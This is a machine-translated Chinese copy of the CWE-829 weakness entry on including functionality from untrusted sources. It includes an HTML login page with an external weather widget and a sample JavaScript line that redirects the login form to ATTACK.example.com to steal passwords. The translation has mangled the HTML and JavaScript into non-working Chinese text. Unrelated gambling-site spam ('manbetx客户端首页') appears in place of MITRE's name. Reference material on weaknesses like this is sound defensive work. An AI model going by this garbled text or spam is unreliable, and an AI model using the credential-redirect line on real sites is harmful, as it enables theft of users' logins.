cwe - 829:包含的功能不受信任的控制范围
视图定制的信息: div >的用户感兴趣的更多的概念方面的一个弱点。例如:教育者,技术作家和项目/项目经理。
用户关心的实际应用和细节的本质弱点以及如何预防它的发生。例子:工具开发人员、安全人员、pen-testers事件反应分析师。
对于用户映射一个问题CWE / CAPEC id,即。,找到最合适的CWE为一个特定的问题(例如,CVE记录)。例如:工具开发人员、安全人员。
用户希望看到所有可用的信息CWE / CAPEC条目。
为用户谁想要定制显示细节。
×
编辑自定义过滤器![]()
产品进口,需要,或包含可执行功能(如图书馆)从源目的控制范围之外的。 div >< / div >< / div >< / div > ![]() 当包括第三方功能,比如web部件,图书馆,或其他来源的功能,功能的产品必须有效地信任。没有足够的保护机制,本质上可能是恶意的功能(通过来自一个不可信的来源,被欺骗,或者从可信的源在运输过程中被修改)。功能可能也包含自己的弱点,或授权访问额外的功能和状态信息应保密基础系统,如系统状态信息、敏感的应用程序数据,或者DOM的web应用程序。 这可能导致不同的后果取决于所包括的功能,但一些例子包括注入恶意软件,接触的信息给予过多的特权或权限不受信任的功能,基于dom的XSS漏洞,盗取用户的饼干,或者打开重定向到恶意软件(cwe - 601)。 ![]() ![]() ![]()
![]() ![]()
![]() ![]()
![]() ![]()
![]() ![]()
![]() ![]()
![]() 示例1 这个登录页面包括一个天气小部件从外部网站:
(坏的代码) div >
例如语言:HTML div >< / div >
< div class = "头" >欢迎!
< div id = " loginBox " >请登录:
<形式id = " loginForm " name = " loginForm " action = "登录。php”方法= " post " > 用户名:< input type = " text " name = "用户名" / > < br / > 密码:< input type = "密码" name = "密码" / > < input type = " submit " value = "登录" / > > < /形式 div > div > < div id = " WeatherWidget " >
<脚本type = " text / javascript“src = "externalDomain.example.com/weatherwidget.js " > < /脚本> div > div > div > div > div >< / div >< / div >< / div >< / div > 这个网页现在只有一样安全的外部域包括功能。如果攻击者攻陷外部域和可以添加weatherwidget恶意脚本。js文件,攻击者可以完全控制,如任何XSS的弱点(cwe - 79)。 例如,用户登录信息很容易被偷weatherwidget.js添加了一行:
(攻击代码) div >
例如语言:JavaScript div >< / div >
…天气小部件代码.... . getelementbyid (“loginForm”)。action = "ATTACK.example.com/stealPassword.php”; div >< / div >< / div >< / div >< / div > 这行javascript更改登录表单的原始行动目标从最初的网站,网站的攻击。因此,如果用户试图登录自己的用户名和密码将会直接发送到攻击网站。 ![]()
![]()
![]()
![]() ![]()
![]()
![]()
![]()
![]()
更多的信息是可用的,请编辑自定义过滤器或选择一个不同的过滤器。 div >< / div > |
使用常见的弱点枚举(CWE)和相关的引用从这个网站的使用条款。CWE赞助的美国国土安全部(DHS)网络和基础设施安全机构(CISA)和管理的国土安全系统工程和发展研究所这是由(HSSEDI)manbetx客户端首页(斜方)。版权©2006 - 2023,斜方公司。manbetx客户端首页CWE、水煤浆、CWRAF, CWE标志是斜方公司的商标。manbetx客户端首页 |